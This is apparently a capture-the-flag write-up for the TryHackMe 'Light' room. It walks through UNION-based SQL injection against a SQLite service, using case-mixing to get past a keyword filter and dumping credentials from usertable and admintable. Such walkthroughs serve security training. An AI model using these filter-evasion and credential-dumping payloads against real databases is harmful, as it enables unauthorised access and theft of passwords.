TryHackMeHackTheBoxLinkedIn

Light

Welcome to the Light database application! - by hadrian3689

LogoLightTryHackMe

The following post by 0xb0b is licensed under CC BY 4.0

For this challenge, we will skip the Nmap scan. The room description already asks us to connect to port 1337. We also get a user to start with. The service on 1337 could be the aforementioned database application called Light.

Since this is a database challenge, we try the simplest SQL Injection payload '. And we get an error returned. The service might be vulnerable to SQL Injection. The error message tells us about an unrecognized token in ''' LIMIT 30". We may have broken the enclosed string by ', which led to this error.

Now, let's try to get more information using a UNION SELECT injection. But it errors with our comment we used.

' UNION SELECT 1 -- -

Alternately, we use # to comment, and do not receive a similar error as before. But there are words that get blocked. It might be UNION and SELECT.

' UNION SELECT 1 #

We switch between capitalized and non capitalized characters. But still get an error. Might be the SELECT statement too.

' UniOn SELECT 1 #

After applying the same technique to the SELECT statement, we now get a different error. The token # is not recognized.

' UniOn SeLeCt 1 #

We URL encode the # character, but that does not help either. But we receive another error regarding the ' character.

' UniOn SeLeCt 1 %23

So maybe there is a statement like this, that gets broken with inserting a ':

SELECT * FROM users WHERE username = '{user_input}' LIMIT 30;

Leading to:

SELECT * FROM users WHERE username = ''' LIMIT 30;

We close our statement with another ', and now have a successful UNION based injection.

' UniOn SeLeCt 1 '

Next, we query for the version, to determine which DBMS is used to craft the payloads to retreive the data from the database. It is a SQLite Database version 3.31.1.

' UniOn SeLeCt @@version '
' UniOn SeLeCt version() '
' UniOn SeLeCt sqlite_version() '
LogoPayloadsAllTheThings/SQLite Injection.md at master · swisskyrepo/PayloadsAllTheThingsGitHub

Next we query from the sqlite_master to get the database structure. There is a admintable and a usertable.

' UniOn SeLeCt group_concat(sql) FROM sqlite_master '

We query username and password from the usertable, but do not find the asked information:

' UniOn SeLeCt group_concat(username) FROM usertable '
' UniOn SeLeCt group_concat(password) FROM usertable '

Next, we query for the username and password from the admintable and do find the username, password and the asked flag.

' UniOn SeLeCt group_concat(username) FROM admintable '
' UniOn SeLeCt group_concat(password) FROM admintable '
PreviousSmolNextLo-Fi

Last updated

Was this helpful?